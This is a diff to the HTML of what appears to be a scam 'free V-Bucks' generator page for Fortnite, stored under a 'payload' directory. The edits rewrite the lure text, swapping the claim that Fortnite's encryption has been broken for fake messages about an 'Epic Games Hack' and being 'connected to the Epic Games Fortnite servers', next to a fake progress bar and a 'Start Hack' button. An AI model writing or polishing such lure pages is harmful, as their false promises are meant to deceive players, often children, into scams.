--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -92,20 +92,20 @@
                            <div class="progress">
                               <div class="progress-bar   active g-progressbar" role="progressbar" style="width: 20%"></div>
                            </div>
-                           <p class="progress-description">Please wait until the process is complete
+                           <p class="progress-description">
                            </p>
                         </div>
                      </div>
                      <div class="col-lg-12 verification-wrap" style="display: none;">
                         <div class="verification col-sm-7 col-xs-9 center-block">
                            <div class="header-wrap">
-                              <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Verification</h4>
+                              <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Epic Games Hack</h4>
                            </div>
                            <div class="content-ver">
-                              <p><span id="user-text2"></span>, Fortnite's encryption algorithms have been broken in order to add V-bucks to your account.</p>
+                              <p><span id="user-text2"></span> has been connected to the Epic Games Fortnite servers. Click 'Finish Hack' to add your V-Bucks.</p>
                               <div class="verify-btn center-block text-center">
                                  <div class="verify-btn-text">
-                                    <a onclick="start_hack();" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Finish Hack</a>
+                                    <a onclick="start_hack();" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Start Hack</a>
                                  </div>
                               </div>
                            </div>
